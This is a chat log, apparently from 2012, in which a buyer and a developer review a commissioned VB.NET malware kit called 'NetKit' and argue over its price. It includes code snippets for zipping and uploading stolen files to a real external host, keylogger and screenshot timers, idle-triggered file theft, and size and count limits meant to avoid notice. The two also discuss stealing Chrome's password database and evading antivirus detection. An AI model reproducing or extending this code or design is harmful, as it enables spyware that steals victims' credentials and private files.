  2143. [12/19/2012 8:56:17 PM] ' Tweety HF;: the process is running but it sends a message to the taskmanager and removes itself
  2144. [12/19/2012 8:56:26 PM] ' Tweety HF;: since its on ring3
  2145. [12/19/2012 8:56:32 PM] ' Tweety HF;: it bypasses admin rights
  2146. [12/19/2012 8:56:43 PM] Shelly Bongo: ok
  2147. [12/19/2012 8:57:00 PM] Shelly Bongo: show me sqlite working
  2148. [12/19/2012 9:00:29 PM] Shelly Bongo: ...
  2149. [12/19/2012 9:00:59 PM] ' Tweety HF;: it downloads it..
  2150. [12/19/2012 9:01:06 PM] Shelly Bongo: it's corrupted.
  2151. [12/19/2012 9:01:08 PM] Shelly Bongo: it doesn't work
  2152. [12/19/2012 9:01:15 PM] ' Tweety HF;: yeah i know
  2153. [12/19/2012 9:01:31 PM] Shelly Bongo: ok, lets continue in the meanwhile
  2154. [12/19/2012 9:01:35 PM] Shelly Bongo: mark sqlite as a bug to fix
  2155. [12/19/2012 9:01:40 PM] ' Tweety HF;: alright
  2156. [12/19/2012 9:01:54 PM] Shelly Bongo: where are the passwrods?
  2157. [12/19/2012 9:01:58 PM] Shelly Bongo: in the log file?
  2158. [12/19/2012 9:01:58 PM] ' Tweety HF;: sys info
  2159. [12/19/2012 9:02:01 PM] ' Tweety HF;: yeah
  2160. [12/19/2012 9:02:37 PM] ' Tweety HF;: oh
  2161. [12/19/2012 9:02:45 PM] ' Tweety HF;: and if you do somehow magically find netkits process
  2162. [12/19/2012 9:02:45 PM] ' Tweety HF;: and try end it
  2163. [12/19/2012 9:02:51 PM] ' Tweety HF;: you get blue screenof death
  2164. [12/19/2012 9:03:23 PM] Shelly Bongo: which are the files that are dropped by netkit?
  2165. [12/19/2012 9:03:26 PM] Shelly Bongo: updates.dll
  2166. [12/19/2012 9:03:29 PM] Shelly Bongo: and what else?
  2167. [12/19/2012 9:03:29 PM] ' Tweety HF;: yeah
  2168. [12/19/2012 9:03:43 PM] ' Tweety HF;: it drops everything, zips it up, and after delivery deletes them from the system
  2169. [12/19/2012 9:03:47 PM] ' Tweety HF;: it uses an API to do it
  2170. [12/19/2012 9:03:52 PM] Shelly Bongo: what if the user is offline
  2171. [12/19/2012 9:03:54 PM] Shelly Bongo: or the delivery fails
  2172. [12/19/2012 9:04:16 PM] ' Tweety HF;: it waits till the internet connection is back online
  2173. [12/19/2012 9:04:19 PM] Shelly Bongo: will it retry delivering all the files in that directory?
  2174. [12/19/2012 9:04:22 PM] ' Tweety HF;: yeah
  2175. [12/19/2012 9:04:29 PM] Shelly Bongo: e.g. if 20 files piled up
  2176. [12/19/2012 9:04:34 PM] Shelly Bongo: when it can - it'll deliver them all?
  2177. [12/19/2012 9:04:39 PM] ' Tweety HF;: yes
  2178. [12/19/2012 9:04:54 PM] Shelly Bongo: show me the retry code
  2179. [12/19/2012 9:05:33 PM] ' Tweety HF;: End If
  2180.         If FileWriter("SELECT * load", Nothing) = "SELECT * complete" Then
  2181.             For Each File As [String] In Temp
  2182.                 Hash.Add(File)
  2183.             Next
  2184.             For Each Location As [String] In Locations
  2185. [12/19/2012 9:05:40 PM] ' Tweety HF;: it loads all the files it has in the hashes
  2186. [12/19/2012 9:05:49 PM] ' Tweety HF;: if its not loaded in, in the next one it will add it to the que
  2187. [12/19/2012 9:06:00 PM] ' Tweety HF;: If Not Send.Count = 0 Then
  2188. [12/19/2012 9:06:03 PM] ' Tweety HF;: it will check the count
  2189. [12/19/2012 9:06:12 PM] ' Tweety HF;: if the file has been sent 0 times, it will redo it
  2190. [12/19/2012 9:06:19 PM] ' Tweety HF;:  If Not Send.Count = 0 Then
  2191.                 ZipFiles(Send.ToArray(), Environment.GetFolderPath(Environment.SpecialFolder.Templates) + "\system\" + ZipName(Item.Files) + ".Zip")
  2192.                 Upload(Environment.GetFolderPath(Environment.SpecialFolder.Templates) + "\system\" + ZipName(Item.Files) + ".Zip")
  2193.                 Hash.Clear()
  2194.                 Send.Clear()
  2195.             End If
  2196. [12/19/2012 9:06:44 PM] Shelly Bongo: okay
  2197. [12/19/2012 9:06:47 PM] Shelly Bongo: looks good so far
  2198. [12/19/2012 9:06:49 PM] ' Tweety HF;: mhm
  2199. [12/19/2012 9:06:54 PM] Shelly Bongo: though i'm not happy with the fact it drops files
  2200. [12/19/2012 9:07:07 PM] Shelly Bongo: it explains the 9/35 detection
  2201. [12/19/2012 9:07:23 PM] ' Tweety HF;: the detections are generic
  2202. [12/19/2012 9:07:33 PM] ' Tweety HF;: its nothing to do with the dropped files
  2203. [12/19/2012 9:07:48 PM] Shelly Bongo: how complex is it to FUD it?
  2204. [12/19/2012 9:08:04 PM] ' Tweety HF;: not complex, just takes maybe 20-30 mins
  2205. [12/19/2012 9:08:06 PM] ' Tweety HF;: but
  2206. [12/19/2012 9:08:12 PM] ' Tweety HF;: the source wont be readable if i do that
  2207. [12/19/2012 9:08:39 PM] Shelly Bongo: oh... so it has to be done in source, because it gets compiled to MSIL - and AVs decompile .Net exe files back to MSIL and use patterns to find malware..
  2208. [12/19/2012 9:08:55 PM] ' Tweety HF;: they dont decompile
  2209. [12/19/2012 9:09:00 PM] ' Tweety HF;: they look for string hashes
  2210. [12/19/2012 9:09:03 PM] ' Tweety HF;: like this
  2211. [12/19/2012 9:09:43 PM] Shelly Bongo: encrypted transfer - show me
  2212. [12/19/2012 9:10:01 PM] ' Tweety HF;: i cant exactly show that lol
  2213. [12/19/2012 9:10:06 PM] Shelly Bongo: yes you can
  2214. [12/19/2012 9:10:08 PM] Shelly Bongo: run wireshark
  2215. [12/19/2012 9:10:23 PM] ' Tweety HF;: i wrote an ecnryption class
  2216. [12/19/2012 9:10:26 PM] ' Tweety HF;: aes 2556 bits
  2217. [12/19/2012 9:10:51 PM] ' Tweety HF;: oh yeah
  2218. [12/19/2012 9:10:53 PM] ' Tweety HF;: sec
  2219. [12/19/2012 9:11:48 PM] Shelly Bongo: is it really aes?
  2220. [12/19/2012 9:11:50 PM] Shelly Bongo: doesn't look like it
  2221. [12/19/2012 9:11:54 PM] Shelly Bongo: where's the encryption password
  2222. [12/19/2012 9:12:08 PM] ' Tweety HF;: sec
  2223. [12/19/2012 9:12:50 PM] ' Tweety HF;: phone
  2224. [12/19/2012 9:14:01 PM] Shelly Bongo: show me update.php
  2225. [12/19/2012 9:14:25 PM] ' Tweety HF;: simple
  2226. [12/19/2012 9:14:44 PM] Shelly Bongo: where's the aes key?
  2227. [12/19/2012 9:15:05 PM] ' Tweety HF;: at the moment its keyless, it just uses aes 256 encryption
  2228. [12/19/2012 9:15:08 PM] ' Tweety HF;: i set the key to blank
  2229. [12/19/2012 9:15:17 PM] Shelly Bongo: so it's not aes
  2230. [12/19/2012 9:15:23 PM] Shelly Bongo: if you knew anything about crypto, you'd know that
  2231. [12/19/2012 9:15:28 PM] ' Tweety HF;: it is aes..
  2232. [12/19/2012 9:15:30 PM] Shelly Bongo: it's probably some crap keyless crypto
  2233. [12/19/2012 9:15:35 PM] ' Tweety HF;: no.
  2234. [12/19/2012 9:15:37 PM] ' Tweety HF;: its aes
  2235. [12/19/2012 9:15:39 PM] ' Tweety HF;: 256
  2236. [12/19/2012 9:15:43 PM] ' Tweety HF;: but i did not put a key on it
  2237. [12/19/2012 9:17:45 PM] Shelly Bongo: where's sqlite stored? as part of sysinfo zip?
  2238. [12/19/2012 9:17:49 PM] Shelly Bongo: (when it workss)
  2239. [12/19/2012 9:19:12 PM] ' Tweety HF;: its stored in file stranfer
  2240. [12/19/2012 9:19:17 PM] ' Tweety HF;: so files
  2241. [12/19/2012 9:19:22 PM] Shelly Bongo: move it to sysinfo zip
  2242. [12/19/2012 9:19:29 PM] Shelly Bongo: it's a part of the password stealing
  2243. [12/19/2012 9:19:41 PM] ' Tweety HF;: but its a whole file
  2244. [12/19/2012 9:19:47 PM] ' Tweety HF;: or you want me to move it to that zip
  2245. [12/19/2012 9:19:48 PM] Shelly Bongo: yes, you can stick it into teh zip
  2246. [12/19/2012 9:19:50 PM] Shelly Bongo: yep
  2247. [12/19/2012 9:21:09 PM] Shelly Bongo: please do it later
  2248. [12/19/2012 9:21:12 PM] Shelly Bongo: we're almost done
  2249. [12/19/2012 9:21:19 PM] Shelly Bongo: i want to talk about file stealer now
  2250. [12/19/2012 9:21:31 PM] ' Tweety HF;: done
  2251. [12/19/2012 9:22:03 PM] Shelly Bongo: but before that - show me the *different* variables for intervals for files/logs/screenshots/sysinfo
  2252. [12/19/2012 9:22:22 PM] ' Tweety HF;: keylogger interval
  2253. [12/19/2012 9:22:39 PM] ' Tweety HF;: Public WithEvents Screenshot_Timer As Windows.Forms.Timer = New Windows.Forms.Timer With {.Interval = 60000, .Enabled = True}
  2254. [12/19/2012 9:22:42 PM] ' Tweety HF;: for screenshots
  2255. [12/19/2012 9:22:49 PM] ' Tweety HF;:     Public WithEvents Cycle_Timer As Windows.Forms.Timer = New Windows.Forms.Timer With {.Interval = 60000, .Enabled = True}
  2256. [12/19/2012 9:22:51 PM] ' Tweety HF;: file cycle timer
  2257. [12/19/2012 9:23:10 PM] Shelly Bongo: and sysinfo?
  2258. [12/19/2012 9:23:32 PM] ' Tweety HF;: sys info runs every time the comp is rebooted
  2259. [12/19/2012 9:23:35 PM] Shelly Bongo: okay
  2260. [12/19/2012 9:23:39 PM] Shelly Bongo: so on startup of netkit?
  2261. [12/19/2012 9:23:56 PM] ' Tweety HF;: yes
  2262. [12/19/2012 9:24:09 PM] Shelly Bongo: i want to add a timer to it - to-rerun after it has been started too
  2263. [12/19/2012 9:24:14 PM] Shelly Bongo: e.g. once every 12 hours (default timer)
  2264. [12/19/2012 9:24:20 PM] Shelly Bongo: ok?
  2265. [12/19/2012 9:25:50 PM] ' Tweety HF;: Done
  2266. [12/19/2012 9:25:59 PM] Shelly Bongo: okay
  2267. [12/19/2012 9:26:02 PM] Shelly Bongo: now the file stealer
  2268. [12/19/2012 9:26:27 PM] Shelly Bongo: if i start netkit
  2269. [12/19/2012 9:26:55 PM] Shelly Bongo: and after 1min the computer becomes idle (e.g. screen saver kicks in, or user locks the comp)
  2270. [12/19/2012 9:27:02 PM] Shelly Bongo: i want file stealer to start stealing
  2271. [12/19/2012 9:27:08 PM] Shelly Bongo: is it in the code? if so show me
  2272. [12/19/2012 9:27:29 PM] ' Tweety HF;: yes
  2273. [12/19/2012 9:28:02 PM] ' Tweety HF;: it checks every 5min
  2274. [12/19/2012 9:28:11 PM] ' Tweety HF;:  If IdleTicks <= 300000 Then
  2275.                     Cycle(Location)
  2276.                 End If
  2277. [12/19/2012 9:28:32 PM] Shelly Bongo: no - this checks that if comp was idle for LESS than 5 mins, then it steals files
  2278. [12/19/2012 9:28:39 PM] Shelly Bongo: why for LESS?
  2279. [12/19/2012 9:28:44 PM] Shelly Bongo: should be for more
  2280. [12/19/2012 9:28:52 PM] ' Tweety HF;: oh whoops lol
  2281. [12/19/2012 9:28:59 PM] Shelly Bongo: also
  2282. [12/19/2012 9:29:05 PM] Shelly Bongo: this runs every CycleTimer
  2283. [12/19/2012 9:29:12 PM] Shelly Bongo: CycleTimer is the timer for file stealing
  2284. [12/19/2012 9:29:13 PM] Shelly Bongo: right?
  2285. [12/19/2012 9:29:20 PM] ' Tweety HF;: this is within cycle timer
  2286. [12/19/2012 9:29:26 PM] ' Tweety HF;: cycle timer checks for all the conditions
  2287. [12/19/2012 9:30:05 PM] Shelly Bongo: okay - i want a separate timer for the idle check - check idle every 5 min and send stuff if idle
  2288. [12/19/2012 9:30:19 PM] Shelly Bongo: stealertime should run every hour - and send files even if not idle
  2289. [12/19/2012 9:30:36 PM] ' Tweety HF;: thats the same as idle?
  2290. [12/19/2012 9:31:09 PM] Shelly Bongo: what do you mean
  2291. [12/19/2012 9:31:13 PM] ' Tweety HF;: think im getting confuzzled
  2292. [12/19/2012 9:31:17 PM] ' Tweety HF;: can you explain the 2 conditions
  2293. [12/19/2012 9:31:21 PM] Shelly Bongo: yes
  2294. [12/19/2012 9:31:26 PM] Shelly Bongo: but sorry i have to leave for another 3 hours
  2295. [12/19/2012 9:31:33 PM] ' Tweety HF;: oh my
  2296. [12/19/2012 9:31:34 PM] Shelly Bongo: we have little left to go over
  2297. [12/19/2012 9:31:34 PM] ' Tweety HF;: >.>
  2298. [12/19/2012 9:31:36 PM] ' Tweety HF;: alright
  2299. [12/19/2012 11:31:52 PM] Shelly Bongo: hi
  2300. [12/19/2012 11:33:40 PM] Shelly Bongo: i'll explain the 2 different triggers for file-stealer to send out files:
  2301. 1) if FILECYCLE_TIMER reached (default: 1 hour) - meaning that every 1 hour, it should send out files
  2302. 2) if the computer has been idle for more than 5 minutes
  2303. [12/19/2012 11:34:30 PM] Shelly Bongo: the two triggers are independant of one another - meaning it could be that FILECYCLE_TIMER just finshed running, and after 1 min the second trigger kicks in because the computer has been idle for more than 5min - so it'll send files again
  2304. [12/19/2012 11:34:32 PM] Shelly Bongo: got it?
  2305. [12/19/2012 11:40:05 PM] ' Tweety HF;: 1 sec
  2306. [12/19/2012 11:40:08 PM] ' Tweety HF;: just making some coffee
  2307. [12/19/2012 11:43:15 PM] Shelly Bongo: okay
  2308. [12/19/2012 11:43:40 PM] Shelly Bongo: i'm hoping we can finish tonight
  2309. [12/19/2012 11:43:54 PM] Shelly Bongo: my BTC has been ready and waiting since last week.
  2310. [12/19/2012 11:44:31 PM] Shelly Bongo: let me know if the above behavior for file stealer is understood and you're going to implement it, as it seems like it was misunderstood previously.
  2311. [12/19/2012 11:47:06 PM] ' Tweety HF;: ohh ok
  2312. [12/19/2012 11:47:10 PM] ' Tweety HF;: i get it
  2313. [12/19/2012 11:50:13 PM] Shelly Bongo: okay great
  2314. [12/19/2012 11:53:12 PM] ' Tweety HF;: Done
  2315. [12/19/2012 11:53:21 PM] Shelly Bongo: another thing (i'm going over the filestealer.txt description)
  2316. [12/19/2012 11:53:26 PM] Shelly Bongo: FILER_MAX_FILESIZE - implemented?
  2317. [12/19/2012 11:53:30 PM] Shelly Bongo: my concern is this
  2318. [12/19/2012 11:53:37 PM] Shelly Bongo: imagine target has 200mb of files that match...
  2319. [12/19/2012 11:53:45 PM] ' Tweety HF;: a 200mb word file..?
  2320. [12/19/2012 11:53:46 PM] Shelly Bongo: he will notice his internet connection being slow..
  2321. [12/19/2012 11:53:52 PM] Shelly Bongo: imagine he has 20000 word files.
  2322. [12/19/2012 11:54:03 PM] Shelly Bongo: i want to limit each "cycle" to something
  2323. [12/19/2012 11:54:20 PM] Shelly Bongo: there are 2 limitations i want
  2324. [12/19/2012 11:54:23 PM] Shelly Bongo: 1) maximum filesize
  2325. [12/19/2012 11:54:27 PM] Shelly Bongo: (e.g. 10MB)
  2326. [12/19/2012 11:54:40 PM] Shelly Bongo: so if a file matches the pattern is higher than this - they don't get sent
  2327. [12/19/2012 11:55:10 PM] Shelly Bongo: and 2) maximum number of files per cycle (default: 10) - so each file stealing cycle, no more than 10 files will leak out
  2328. [12/19/2012 11:55:26 PM] ' Tweety HF;: lol
  2329. [12/19/2012 11:55:30 PM] ' Tweety HF;: it uses multi byte packets
  2330. [12/19/2012 11:55:36 PM] ' Tweety HF;: its seriously not an issue
  2331. [12/19/2012 11:55:39 PM] Shelly Bongo: what?
  2332. [12/19/2012 11:55:46 PM] ' Tweety HF;: multi byte packets
  2333. [12/19/2012 11:55:51 PM] ' Tweety HF;: each packet is multi threaded
  2334. [12/19/2012 11:55:54 PM] ' Tweety HF;: its not:
  2335. [12/19/2012 11:56:04 PM] ' Tweety HF;: [packet1] then [packet2] basis
  2336. [12/19/2012 11:56:13 PM] ' Tweety HF;: its [packet1] + [packet2] same time
  2337. [12/19/2012 11:56:29 PM] Shelly Bongo: i think you're not getting the concern
  2338. [12/19/2012 11:56:34 PM] Shelly Bongo: regardless, i want these 2 limitations
  2339. [12/19/2012 11:56:38 PM] ' Tweety HF;: alright
  2340. [12/19/2012 11:56:42 PM] Shelly Bongo: they've been in the spec from day 1
  2341. [12/19/2012 11:57:02 PM] Shelly Bongo: did you fix sqlite btw?
  2342. [12/19/2012 11:57:06 PM] Shelly Bongo: the sqlite stealing
  2343. [12/19/2012 11:57:08 PM] Shelly Bongo: for chrome
  2344. [12/19/2012 11:57:41 PM] ' Tweety HF;: checking it now
  2345. [12/19/2012 11:57:44 PM] Shelly Bongo: ok
  2346. [12/19/2012 11:59:29 PM] Shelly Bongo: so
  2347. [12/19/2012 11:59:38 PM] Shelly Bongo: to be orderly
  2348. [12/19/2012 11:59:40 PM] Shelly Bongo: + sysinfo password recovery (chrome sqlite file stealer) - fix it to make it work
  2349. + file stealer: add FILER_MAX_FILESIZE (files above this size don't get sent) & FILER_MAX_FILES (max amount of files to send in each cycle/zip) limitations
  2350. + aes with password - encrypt in netkit and decrypt in php before storing the file
  2351. + put all config vars into a single file
  2352. [12/19/2012 11:59:57 PM] Shelly Bongo: this is what you have left to do - once it's done we have another TV session
  2353. [12/20/2012 12:00:09 AM] Shelly Bongo: and complete the purchase
  2354. [12/20/2012 12:00:39 AM] Shelly Bongo: ok?
  2355. [12/20/2012 12:07:38 AM] ' Tweety HF;: ok
  2356. [12/20/2012 12:39:05 AM] ' Tweety HF;: done
  2357. [12/20/2012 12:45:56 AM] ' Tweety HF;: What now?
  2358. [12/20/2012 12:46:13 AM] Shelly Bongo: done with all of the above?
  2359. [12/20/2012 12:46:16 AM] Shelly Bongo: are you sure?
  2360. [12/20/2012 12:46:30 AM] ' Tweety HF;: Sec
  2361. [12/20/2012 12:54:17 AM] ' Tweety HF;: all done now
  2362. [12/20/2012 12:56:37 AM] ' Tweety HF;: the reason that the sqlite got corrupt
  2363. [12/20/2012 12:57:02 AM] ' Tweety HF;: was because of how the debugger paused netkit to show the break
  2364. [12/20/2012 1:00:04 AM] Shelly Bongo: ok
  2365. [12/20/2012 1:00:38 AM] Shelly Bongo: so you implemented both  FILER_MAX_FILESIZE and FILER_MAX_FILES ?
  2366. [12/20/2012 1:01:18 AM] ' Tweety HF;: yes
  2367. [12/20/2012 1:02:20 AM] Shelly Bongo: did you put all the configurable variables into a single file (so that i don't have to jump through various .vb files)?
  2368. [12/20/2012 1:02:49 AM] ' Tweety HF;: its not in a single file
  2369. [12/20/2012 1:02:55 AM] ' Tweety HF;: but its very easy to change
  2370. [12/20/2012 1:02:58 AM] ' Tweety HF;: or do you want 1 file
  2371. [12/20/2012 1:03:27 AM] Shelly Bongo: i want 1 file
  2372. [12/20/2012 1:03:34 AM] ' Tweety HF;: ill add a structure
  2373. [12/20/2012 1:03:34 AM] ' Tweety HF;: hold o
  2374. [12/20/2012 1:03:37 AM] Shelly Bongo: ok
  2375. [12/20/2012 1:09:59 AM] ' Tweety HF;:  Public Structure Settings
  2376.         Public Shared Host$ = "http://www.hftweety.site88.net/data/Update.php"
  2377.         Public Shared Key$ = "key"
  2378.         Public Shared Screenshot_Timer_Interval% = 60000
  2379.         Public Shared Cycle_Timer_Interval% = 60000
  2380.         Public Shared Idle_Timer_Interval% = 60000
  2381.         Public Shared KeyStroke_Interval% = 60000
  2382.     End Structure
  2383. [12/20/2012 1:10:02 AM] ' Tweety HF;: Am i missing anything?
  2384. [12/20/2012 1:10:06 AM] ' Tweety HF;: oh files timer
  2385. [12/20/2012 1:10:10 AM] ' Tweety HF;: oh nvm, thats cycle
  2386. [12/20/2012 1:10:46 AM] ' Tweety HF;: anything else?
  2387. [12/20/2012 1:13:40 AM] Shelly Bongo: hmm
  2388. [12/20/2012 1:13:57 AM] Shelly Bongo: the extensions of files for the file stealer
  2389. [12/20/2012 1:14:29 AM] Shelly Bongo: also,  FILER_MAX_FILESIZE &  FILER_MAX_FILES
  2390. [12/20/2012 1:14:34 AM] ' Tweety HF;: alright
  2391. [12/20/2012 1:15:34 AM] Shelly Bongo: after you're done with this, there's one last thing - the encryption
  2392. [12/20/2012 1:16:00 AM] ' Tweety HF;: what about it
  2393. [12/20/2012 1:16:34 AM] Shelly Bongo: you send out encrypted files (with what you claim is a password-less AES 256), and the PHP just saves those files
  2394. [12/20/2012 1:16:41 AM] Shelly Bongo: I want the PHP to *decrypt* them before saving
  2395. [12/20/2012 1:18:03 AM] ' Tweety HF;: i know
  2396. [12/20/2012 1:18:05 AM] ' Tweety HF;: i did that
  2397. [12/20/2012 1:18:19 AM] Shelly Bongo: the PHP file you showed me had no decryption routines
  2398. [12/20/2012 1:18:37 AM] ' Tweety HF;: i didnt put them in since i was testing
  2399. [12/20/2012 1:18:40 AM] ' Tweety HF;: but i fixed it up
  2400. [12/20/2012 1:18:44 AM] Shelly Bongo: okay
  2401. [12/20/2012 1:18:53 AM | Removed 1:19:29 AM] ' Tweety HF;: This message has been removed.
  2402. [12/20/2012 1:19:41 AM] Shelly Bongo: so after you're done with making those global settings, lets have another session
  2403. [12/20/2012 1:19:55 AM] Shelly Bongo: show me that the last changes we made work
  2404. [12/20/2012 1:20:01 AM] Shelly Bongo: and i'll transfer the BTC
  2405. [12/20/2012 1:20:06 AM] Shelly Bongo: and you provide the source
  2406. [12/20/2012 1:20:10 AM] Shelly Bongo: and delete from your computer
  2407. [12/20/2012 1:20:17 AM] ' Tweety HF;: sure
  2408. [12/20/2012 1:30:24 AM] ' Tweety HF;: done
  2409. [12/20/2012 1:31:54 AM] Shelly Bongo: great!
  2410. [12/20/2012 1:31:59 AM] Shelly Bongo: let me connect to you now
  2411. [12/20/2012 1:32:06 AM] Shelly Bongo: and show me
  2412. [12/20/2012 1:32:17 AM] Shelly Bongo: [Wednesday, December 19, 2012 11:59 PM] Shelly Bongo:
  2413.  
  2414. <<< + sysinfo password recovery (chrome sqlite file stealer) - fix it to make it work
  2415. + file stealer: add FILER_MAX_FILESIZE (files above this size don't get sent) & FILER_MAX_FILES (max amount of files to send in each cycle/zip) limitations
  2416. + aes with password - encrypt in netkit and decrypt in php before storing the file
  2417. + put all config vars into a single file
  2418. [12/20/2012 1:33:04 AM] ' Tweety HF;: https://secure.join.me/110-420-021
  2419. [12/20/2012 1:33:16 AM] Shelly Bongo: lets start with sysinfo
  2420. [12/20/2012 1:33:23 AM] ' Tweety HF;: 1 sec
  2421. [12/20/2012 1:33:44 AM] ' Tweety HF;: what about it
  2422. [12/20/2012 1:34:01 AM] ' Tweety HF;: i already tested everything
  2423. [12/20/2012 1:34:17 AM] Shelly Bongo: you didn't show me how sqlite file gets sent along with sysinfo, show me
  2424. [12/20/2012 1:35:37 AM] ' Tweety HF;: ok look
  2425. [12/20/2012 1:35:41 AM] ' Tweety HF;: this is 35mb word file
  2426. [12/20/2012 1:36:08 AM] ' Tweety HF;: and other one is like 10 kb
  2427. [12/20/2012 1:36:23 AM] ' Tweety HF;: Public Shared Function IsEligible(ByVal File As [String]) As Boolean
  2428.         Dim FileInfo As New IO.FileInfo(File)
  2429.         If FileInfo.Length <= NetKit.Settings.MAX_FILE_SIZE Then Return True
  2430.         If Not FileInfo.Length <= NetKit.Settings.MAX_FILE_SIZE Then Return False
  2431.         Return Nothing
  2432.     End Function
  2433. [12/20/2012 1:36:31 AM] ' Tweety HF;: this checks if a file is eligible to be sent
  2434. [12/20/2012 1:41:39 AM] Shelly Bongo: what's going on
  2435. [12/20/2012 1:41:57 AM] ' Tweety HF;: theirs an error throwing
  2436. [12/20/2012 1:42:01 AM] ' Tweety HF;: and its because my browser is open
  2437. [12/20/2012 1:42:05 AM] ' Tweety HF;: i just realized it
  2438. [12/20/2012 1:42:26 AM] Shelly Bongo: so if chrome is open, it wont be able to take the sqlite file?
  2439. [12/20/2012 1:42:32 AM] ' Tweety HF;: apprantly not
  2440. [12/20/2012 1:42:35 AM] ' Tweety HF;: which is a bit retarded
  2441. [12/20/2012 1:42:45 AM] ' Tweety HF;: chrome dosn't need to access it unless it actually uses it
  2442. [12/20/2012 1:42:59 AM] Shelly Bongo: when you open it, are you opening in read only mode?
  2443. [12/20/2012 1:43:11 AM] ' Tweety HF;: it dosn't open anything
  2444. [12/20/2012 1:43:16 AM] ' Tweety HF;: it just copies it and adds it to a zip
  2445. [12/20/2012 1:43:57 AM] ' Tweety HF;: what i can do is
  2446. [12/20/2012 1:44:15 AM] ' Tweety HF;: if the user is idled, then close the browser, send the sqlite, and reopen the browser
  2447. [12/20/2012 1:45:06 AM] Shelly Bongo: i prefer to keep as is
  2448. [12/20/2012 1:45:22 AM] Shelly Bongo: just make it not throw exceptions - ignore exceptions - if there's a problem, continue
  2449. [12/20/2012 1:45:29 AM] Shelly Bongo: (send the zip, just without the sqlite)
  2450. [12/20/2012 1:45:52 AM] ' Tweety HF;: yeah sure
  2451. [12/20/2012 1:45:55 AM] ' Tweety HF;: its done already
  2452. [12/20/2012 1:46:24 AM] ' Tweety HF;: whats next o nthe list
  2453. [12/20/2012 1:46:26 AM] ' Tweety HF;: and btw
  2454. [12/20/2012 1:46:38 AM] ' Tweety HF;: SQLite Database Browser 2.0 b1.exe
  2455. [12/20/2012 1:46:42 AM] ' Tweety HF;: you need that to view the sqlite data
  2456. [12/20/2012 1:46:52 AM] Shelly Bongo: close chrome, and show me that it works with chrome closedd
  2457. [12/20/2012 1:52:13 AM] Shelly Bongo: lol...
  2458. [12/20/2012 1:52:28 AM] ' Tweety HF;: i think
  2459. [12/20/2012 1:52:29 AM] ' Tweety HF;: im being trolled
  2460. [12/20/2012 1:52:32 AM] ' Tweety HF;: by vs
  2461. [12/20/2012 1:52:34 AM] Shelly Bongo: every time we do a session you have features not working, why don't you check before it??
  2462. [12/20/2012 1:52:40 AM] ' Tweety HF;: i did
  2463. [12/20/2012 1:52:47 AM] ' Tweety HF;: its driving me mad
  2464. [12/20/2012 1:52:50 AM] ' Tweety HF;: i put the path in
  2465. [12/20/2012 1:52:53 AM] ' Tweety HF;: and it says it dont exist?
  2466. [12/20/2012 1:53:40 AM] ' Tweety HF;: LOL
  2467. [12/20/2012 1:53:43 AM] ' Tweety HF;: it dont exist apprantly
  2468. [12/20/2012 1:54:36 AM] ' Tweety HF;: can you give me the location
  2469. [12/20/2012 1:54:38 AM] ' Tweety HF;: of your sqlite3
  2470. [12/20/2012 1:55:00 AM] Shelly Bongo: how do i check
  2471. [12/20/2012 1:55:06 AM] ' Tweety HF;: C:\Users\Momz\AppData\Local\Google\Chrome\User Data\Default
  2472. [12/20/2012 1:55:09 AM] ' Tweety HF;: then look for it
  2473. [12/20/2012 1:55:10 AM] ' Tweety HF;: in sync
  2474. [12/20/2012 1:56:39 AM] ' Tweety HF;: working now.
  2475. [12/20/2012 1:56:57 AM] Shelly Bongo: ok show me
  2476. [12/20/2012 1:57:07 AM] Shelly Bongo: the whole sysinfo zip
  2477. [12/20/2012 1:57:14 AM] Shelly Bongo: info passwords sqlite
  2478. [12/20/2012 1:57:47 AM] ' Tweety HF;: sec
  2479. [12/20/2012 2:00:27 AM] ' Tweety HF;: done
  2480. [12/20/2012 2:00:27 AM] ' Tweety HF;: look
  2481. [12/20/2012 2:01:04 AM] ' Tweety HF;: it corrupts..
  2482. [12/20/2012 2:01:05 AM] ' Tweety HF;: wow..
  2483. [12/20/2012 2:01:06 AM] ' Tweety HF;: wtf
  2484. [12/20/2012 2:03:06 AM] ' Tweety HF;: 1 more try
  2485. [12/20/2012 2:03:46 AM] ' Tweety HF;: haha got it
  2486. [12/20/2012 2:04:24 AM] ' Tweety HF;: zipping it corrupts it for some reason
  2487. [12/20/2012 2:04:28 AM] ' Tweety HF;: no worries, i fixed it
  2488. [12/20/2012 2:04:37 AM] Shelly Bongo: this code looks VERY buggy.
  2489. [12/20/2012 2:04:47 AM] Shelly Bongo: lots of exceptions and errors all around
  2490. [12/20/2012 2:05:13 AM] Shelly Bongo: the AES PHP you pasted is bullshit
  2491. [12/20/2012 2:05:32 AM] ' Tweety HF;: theirs no exceptions that need to be caught and disposed off
  2492. [12/20/2012 2:05:37 AM] ' Tweety HF;: the aes in php is a class file
  2493. [12/20/2012 2:05:38 AM] Shelly Bongo: this netkit began well but is ending very badly
  2494. [12/20/2012 2:06:10 AM] Shelly Bongo: foes file-max-size and file-max-num work at least?
  2495. [12/20/2012 2:07:00 AM] Shelly Bongo: ?
  2496. [12/20/2012 2:07:13 AM] ' Tweety HF;: yes..
  2497. [12/20/2012 2:07:18 AM] ' Tweety HF;: i already showed you how it works
  2498. [12/20/2012 2:07:25 AM] Shelly Bongo: ok
  2499. [12/20/2012 2:07:27 AM] Shelly Bongo: listen
  2500. [12/20/2012 2:07:31 AM] Shelly Bongo: honestly, this is shit code.
  2501. [12/20/2012 2:07:38 AM] ' Tweety HF;: lol no.
  2502. [12/20/2012 2:07:50 AM] Shelly Bongo: i have indian who write better and charge less
  2503. [12/20/2012 2:08:00 AM] Shelly Bongo: more orderly, less bugs
  2504. [12/20/2012 2:08:17 AM] Shelly Bongo: and i dont need to tell them benign things like "put all the variables in a single place"
  2505. [12/20/2012 2:08:36 AM] Shelly Bongo: it's obvious you're new to coding hacking programs
  2506. [12/20/2012 2:08:43 AM] ' Tweety HF;: oh thats a new one
  2507. [12/20/2012 2:08:53 AM | Edited 2:10:09 AM] Shelly Bongo: you're young and eager which is nice, but this is anything but professional
  2508. [12/20/2012 2:08:58 AM] Shelly Bongo: i'm sure you'll get there in time
  2509. [12/20/2012 2:09:09 AM] Shelly Bongo: in short - i'm willing to pay $100 for the source, no more
  2510. [12/20/2012 2:09:32 AM] Shelly Bongo: if you don't want it, i walk away, my remaining budget allows me to get the same program from another supplier who will do simply a better job.
  2511. [12/20/2012 2:09:48 AM] ' Tweety HF;: Sure. But im removing the rootkit in that case.
  2512. [12/20/2012 2:10:22 AM] Shelly Bongo: no, this is absurd
  2513. [12/20/2012 2:10:50 AM] Shelly Bongo: you have delayed me, half of the features have been removed - i had to explain to you (worse than to an indian) like 20 times how features should work until you understood it and rectified it
